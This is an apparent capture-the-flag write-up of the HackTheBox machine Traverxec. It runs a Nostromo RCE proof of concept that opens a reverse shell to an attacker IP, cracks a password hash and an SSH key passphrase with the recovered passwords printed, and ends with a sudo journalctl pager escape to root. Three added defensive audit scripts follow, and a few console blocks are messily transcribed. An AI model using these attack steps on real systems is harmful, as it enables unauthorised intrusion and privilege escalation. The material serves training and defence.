Traverxec

Traverxec Linux · Easy - Adventure mode

🔭 Reconnaissance:

```console
┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.11.160
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-16 22:48 +0100
Nmap scan report for 10.129.11.160
Host is up (0.046s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
|_http-server-header: nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.04 seconds
```

[Screenshot: traverexec_web]

```console
┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ dirsearch -u http://traverexec.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/pmartinezr/htb/traverxec/reports/http_traverexec.htb/_26-02-17_00-24-22.txt

Target: http://traverexec.htb/

[00:24:22] Starting:
[00:24:22] 301 -  316B  - /js  ->  http://traverexec.htb/js/
[00:24:30] 501 -  312B  - /admin%20/
[00:24:47] 301 -  316B  - /css  ->  http://traverexec.htb/css/
[00:24:55] 301 -  316B  - /icons  ->  http://traverexec.htb/icons/
[00:24:55] 301 -  316B  - /img  ->  http://traverexec.htb/img/
[00:24:58] 200 -  598B  - /js/
[00:24:59] 301 -  316B  - /lib  ->  http://traverexec.htb/lib/
[00:24:59] 200 -    1KB - /lib/
[00:25:00] 501 -  312B  - /login.wdm%20
[00:25:05] 501 -  312B  - /New%20Folder
[00:25:05] 501 -  312B  - /New%20folder%20(2)
[00:25:09] 501 -  312B  - /phpliteadmin%202.php
[00:25:15] 501 -  312B  - /Read%20Me.txt
[00:25:15] 200 -  203B  - /Readme.txt
[00:25:15] 400 -  304B  - /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession
[00:25:15] 400 -  304B  - /remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd
```

Dirsearch shows a /lib directory; visiting it reveals that the site runs on a Nostromo 1.9.6 web server.

[Screenshot: traverexec_nostromo]

CVE: CVE-2019-16278

💣 Preparation:

https://github.com/cancela24/CVE-2019-16278-Nostromo-1.9.6-RCE

👽 Actions:

```console
┌──(CVE-2019-16278-Nostromo-1.9.6-RCE)(pmartinezr㉿kali)-[~/htb/traverxec/CVE-2019-16278-Nostromo-1.9.6-RCE]
└─$ python poc.py -t 10.129.11.160  -p 80  --attacker-ip 10.10.14.74 --attacker-port 4444
[!] Make sure to start a listener on your attacking machine with the command:
nc -lvnp 4444
[-] Sending payload to the server...: No response received. Retrying...
[+] Opening connection to 10.129.11.160 on port 80: Done
[*] Closed connection to 10.129.11.160 port 80
[*] Retrying (1/3)...
[+] Sending payload to the server...: Payload sent successfully. Shell received!
[+] Opening connection to 10.129.11.160 on port 80: Done
[*] Closed connection to 10.129.11.160 port 80
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
```

In the Nostromo configuration directory we find a hashed password.

```console
hashcat -m 500 hash /usr/share/wordlists/rockyou.txt --username
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
```

This password is presumably used somewhere in the web application, but it is actually not needed to complete the challenge.

```console
┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ hashcat -m 500 hash /usr/share/wordlists/rockyou.txt --username
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]
servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html
# LOGS [OPTIONAL]
logpid                  logs/nhttpd.pid
# SETUID [RECOMMENDED]
user                    www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons                  /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs                /home
homedirs_public         public_www
www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www
www-data@traverxec:/home/david/public_www$ ls
index.html  protected-file-area
```

While hashcat was finishing cracking the previous hash, I looked into the application a little and understood that it can publish a public directory per user if desired, so that homedirs_public public_www is each user's personal page.

[Screenshot: traverexec_david_public_wwww]

We can reach David's personal web page, but it doesn't lead anywhere.
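The homedirs and htpasswd directives in the nhttpd.conf above are what make this stage of the box possible, so here is a small audit script for that configuration. It is an added example written for this post, not code from the machine, the PoC repository or the Nostromo project. It parses an nhttpd.conf in the format shown, parses the matching .htpasswd, and reports what a defender would want to know: per-user directory publishing, a missing user directive, an htpasswd file stored under docroot, and crypt(3) password hashes in a weak scheme such as MD5-crypt (the `$1$` prefix, hashcat mode 500). The sample config and htpasswd entry embedded below are constructed; the hash is a placeholder in `$1$` shape, not the one from the machine, and the severity labels are my own.

```python
"""Audit a Nostromo nhttpd.conf and its .htpasswd for the exposure paths seen in this post.
Added example; the sample inputs below are constructed, not copied from the machine."""
import posixpath

# Constructed config, modelled on the directives shown in the post.
SAMPLE_NHTTPD_CONF = """\
# MAIN
servername      traverxec.htb
serverroot      /var/nostromo
docroot         /var/nostromo/htdocs
docindex        index.html
# SETUID
user            www-data
# BASIC AUTHENTICATION
htaccess        .htaccess
htpasswd        /var/nostromo/conf/.htpasswd
# ALIASES
/icons          /var/nostromo/icons
# HOMEDIRS
homedirs        /home
homedirs_public public_www
"""
# Placeholder in MD5-crypt ($1$) shape; not a real hash.
SAMPLE_HTPASSWD = "david:$1$saltsalt$notarealhashjustaplaceholder\n"

# crypt(3) prefixes, longest first. Which schemes a given server accepts depends on its libc.
CRYPT_SCHEMES = [
    ("$apr1$", "apr1-md5", "weak"),
    ("$2a$", "bcrypt", "ok"), ("$2b$", "bcrypt", "ok"), ("$2y$", "bcrypt", "ok"),
    ("$6$", "sha512-crypt", "ok"),
    ("$5$", "sha256-crypt", "ok"),
    ("$1$", "md5-crypt", "weak"),  # fixed 1000 MD5 rounds: cheap to brute-force (hashcat -m 500)
]


def classify_hash(h):
    """Return (scheme name, strength) for one crypt(3)-style hash string."""
    for prefix, name, strength in CRYPT_SCHEMES:
        if h.startswith(prefix):
            return name, strength
    if len(h) == 13 and "$" not in h:
        return "des-crypt", "weak"
    return "unknown", "unknown"


def parse_nhttpd_conf(text):
    """'key value' lines; keys beginning with '/' are URL aliases; '#' lines are comments."""
    settings, aliases = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        key, value = parts
        (aliases if key.startswith("/") else settings)[key] = value
    return settings, aliases


def parse_htpasswd(text):
    """'user:hash' lines, one per entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#") and ":" in line:
            user, h = line.split(":", 1)
            entries.append((user, h))
    return entries


def is_under(path, root):
    root, path = posixpath.normpath(root), posixpath.normpath(path)
    return path == root or path.startswith(root + "/")


def audit(conf_text, htpasswd_text):
    """Return a list of (severity, message) findings; severities are this script's own labels."""
    settings, _aliases = parse_nhttpd_conf(conf_text)
    findings = []
    serverroot = settings.get("serverroot", "/")
    docroot = settings.get("docroot", "")
    if "homedirs" in settings:
        sub = settings.get("homedirs_public", "<whole home directory>")
        findings.append(("medium", f"homedirs: {settings['homedirs']}/<user>/{sub} is published by the web server"))
    if "user" not in settings:
        findings.append(("high", "no 'user' directive: nhttpd keeps the privileges it was started with"))
    hp = settings.get("htpasswd")
    if hp:
        hp_abs = hp if hp.startswith("/") else posixpath.join(serverroot, hp)  # relative paths hang off serverroot
        if docroot and is_under(hp_abs, docroot):
            findings.append(("high", f"htpasswd file {hp_abs} lives inside docroot {docroot}"))
    for user, h in parse_htpasswd(htpasswd_text):
        name, strength = classify_hash(h)
        if strength != "ok":
            findings.append(("medium", f"user {user}: password stored as {name} ({strength})"))
    return findings


if __name__ == "__main__":
    for severity, message in audit(SAMPLE_NHTTPD_CONF, SAMPLE_HTPASSWD):
        print(f"[{severity}] {message}")
```

Run against the constructed sample it reports the published per-user directory and the MD5-crypt hash, and stays quiet about the htpasswd location because /var/nostromo/conf is outside /var/nostromo/htdocs; pointing it at a real /var/nostromo/conf pair is a one-line change in the `__main__` block.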

```console
www-data@traverxec:/home/david/public_www$ cd protected-file-area/
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
backup-ssh-identity-files.tgz
cp backup-ssh-idenntity-files.tgz /tmp/ome/david/public_www/protected-file-area

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ ssh2john rsa_key > rsa_key.john

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ john rsa_key.john --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (rsa_key)
1g 0:00:00:00 DONE (2026-02-16 23:43) 25.00g/s 4000p/s 4000c/s 4000C/s carolina..david
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ john --show
Password files required, but none specified

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ ssh2john rsa_key > rsa_key.john

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ john rsa_key.john --show
rsa_key:hunter
1 password hash cracked, 0 left

┌──(pmartinezr㉿kali)-[~/htb/traverxec]
└─$ ssh -i rsa_key david@traverexec.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'rsa_key':
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Mon Feb 16 17:46:39 2026 from 10.10.14.74
david@traverxec:~$ cat user.txt
8f60a366e25d92850*********
```

When I found the backup-ssh-identity-files.tgz file I chose to take it to /tmp and extract it. It contains SSH connection files; brute-forcing the private key's passphrase turns up a very weak one, hunter. We get the first flag.

```console
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2026-02-16 16:47:22 EST, end at Mon 2026-02-16 18:04:44 EST. --
Feb 16 16:47:25 traverxec systemd[1]: nostromo.service: Can't open PID file /var/nostromo/logs/nhttpd.pid (yet?) after start:
Feb 16 16:47:25 traverxec nhttpd[800]: started
Feb 16 16:47:25 traverxec nhttpd[800]: max. file descriptors = 1040 (cur) / 1040 (max)
Feb 16 16:47:25 traverxec systemd[1]: Started nostromo nhttpd server.
Feb 16 17:04:36 traverxec nhttpd[969]: /../../../../bin/sh sent a bad cgi header
!/bin/bash
root@traverxec:/home/david/bin#
```
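The journal line `/../../../../bin/sh sent a bad cgi header` above is the server-side trace the earlier exploit leaves: nhttpd logs the request path of the CGI it tried to execute, and that path resolves outside the docroot. The script below, an added example and not part of the post or of the PoC, parses journal lines in that shape, percent-decodes each logged path, resolves it against the docroot from the nhttpd.conf shown earlier, and flags any request whose target lands outside it or that contains a `..` segment. The journal excerpt embedded in it is constructed: one line mirrors the one above, the others are made up for contrast.

```python
"""Flag nhttpd CGI log lines whose request path resolves outside the docroot.
Added example for this post; the journal excerpt below is constructed."""
import posixpath
import re
from urllib.parse import unquote

# Constructed excerpt in the shape of `journalctl -u nostromo.service` output.
SAMPLE_JOURNAL = """\
-- Logs begin at Mon 2026-02-16 16:47:22 EST, end at Mon 2026-02-16 18:04:44 EST. --
Feb 16 16:47:25 traverxec nhttpd[800]: started
Feb 16 16:47:25 traverxec nhttpd[800]: max. file descriptors = 1040 (cur) / 1040 (max)
Feb 16 17:04:36 traverxec nhttpd[969]: /../../../../bin/sh sent a bad cgi header
Feb 16 17:05:01 traverxec nhttpd[970]: /cgi-bin/stats.sh sent a bad cgi header
"""

DOCROOT = "/var/nostromo/htdocs"  # docroot directive from the nhttpd.conf shown in the post

# "Mon DD HH:MM:SS host nhttpd[pid]: message"
JOURNAL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) nhttpd\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
BAD_CGI_RE = re.compile(r"^(?P<path>\S+) sent a bad cgi header$")


def resolve_request_path(url_path, docroot=DOCROOT):
    """Percent-decode the logged path and resolve it the way a naive file server would.
    Returns (resolved filesystem path, True if it stays under docroot)."""
    decoded = unquote(url_path)
    target = posixpath.normpath(posixpath.join(docroot, decoded.lstrip("/")))
    inside = target == docroot or target.startswith(docroot.rstrip("/") + "/")
    return target, inside


def find_traversal_events(journal_text, docroot=DOCROOT):
    """Return one dict per nhttpd CGI line whose path escapes docroot or carries a '..' segment."""
    events = []
    for line in journal_text.splitlines():
        m = JOURNAL_RE.match(line)
        if not m:
            continue  # "-- Logs begin" header and lines from other units
        c = BAD_CGI_RE.match(m["msg"])
        if not c:
            continue
        target, inside = resolve_request_path(c["path"], docroot)
        dotdot = ".." in unquote(c["path"]).split("/")
        if not inside or dotdot:
            events.append({
                "ts": m["ts"],
                "pid": int(m["pid"]),
                "request": c["path"],
                "resolved": target,
                "reason": "escapes docroot" if not inside else "dot-dot segment",
            })
    return events


if __name__ == "__main__":
    for ev in find_traversal_events(SAMPLE_JOURNAL):
        print(f"{ev['ts']} pid={ev['pid']} {ev['request']} -> {ev['resolved']} ({ev['reason']})")
```

On the sample it reports only the pid 969 line, resolved to /bin/sh; the constructed /cgi-bin/stats.sh line stays under the docroot and is ignored. The same check works on any log that records the raw request path, which is why percent-decoding before the `..` test matters.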

The escalation looked harder than it is, since we don't have David's password; however, it was enough to assume that the command really is enabled via sudo. So we shorten the command to /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service, without | /usr/bin/cat, and then, before the journalctl command finishes, we simply enter the payload !/bin/bash and we are root.
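The escalation works because journalctl hands its output to an interactive pager when stdout is a terminal, and under sudo that pager runs as root. The post does not show the sudoers rule on the box, so the script below, an added example and not code from the post, assumes a rule of the shape `david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service` (constructed) and audits a sudoers file for pager-capable commands (journalctl, systemctl) granted without `--no-pager`, printing the fixed rule. Because sudo matches the argument list in the rule literally, putting `--no-pager` in the rule itself is what removes the pager; fixing only the `| /usr/bin/cat` in server-stats.sh would not, since the user can run the sudo command directly. A rule carrying the `NOEXEC:` tag is treated as already mitigated, because sudo's noexec stops journalctl from executing a pager at all.

```python
"""Audit sudoers rules that let a user run pager-capable commands without --no-pager.
Added example for this post; the sudoers fragments below are constructed."""
import posixpath
import re
import shlex

# Constructed: the risky shape implied by server-stats.sh, and its hardened form.
RISKY_SUDOERS = "david ALL=(root) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service\n"
SAFE_SUDOERS = "david ALL=(root) NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service\n"
MISC_SUDOERS = 'Defaults secure_path="/usr/bin:/bin"\n%sudo ALL=(ALL:ALL) ALL\n'

# Commands that open an interactive pager on a TTY, and the flag that disables it.
PAGER_COMMANDS = {"journalctl": "--no-pager", "systemctl": "--no-pager"}

# user  host=(runas) TAG: cmd, cmd   (Defaults and *_Alias lines are skipped before this is tried)
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("#", "Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def fixed_command(argv, flag):
    """Insert the no-pager flag directly after the program path."""
    return " ".join([argv[0], flag] + argv[1:])


def audit_sudoers(text):
    """Return one finding dict per command granted without its no-pager flag."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m["tags"].strip()
        if "NOEXEC:" in tags:
            continue  # sudo noexec blocks the pager exec, so the rule is already mitigated
        for cmd in m["cmds"].split(","):
            argv = shlex.split(cmd.strip())
            if not argv:
                continue
            prog = posixpath.basename(argv[0])
            flag = PAGER_COMMANDS.get(prog)
            if flag is None or flag in argv[1:]:
                continue
            runas = f"({m['runas']}) " if m["runas"] is not None else ""
            tag_str = f"{tags} " if tags else ""
            findings.append({
                "user": m["who"],
                "command": " ".join(argv),
                "problem": f"{prog} runs without {flag}; on a TTY it opens a pager as {m['runas'] or 'root'}",
                "suggested": f"{m['who']} {m['hosts']}={runas}{tag_str}{fixed_command(argv, flag)}",
            })
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(RISKY_SUDOERS + MISC_SUDOERS):
        print(f"{f['user']}: {f['problem']}\n  rule: {f['command']}\n  fix:  {f['suggested']}")
```

Fed the risky fragment it produces exactly the hardened rule shown in `SAFE_SUDOERS`; fed the hardened rule or the unrelated Defaults and %sudo lines it reports nothing. For a real host, read /etc/sudoers and /etc/sudoers.d/* (as root) instead of the constructed strings.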

[Screenshot: achivement]

This post is licensed under CC BY 4.0 by the author.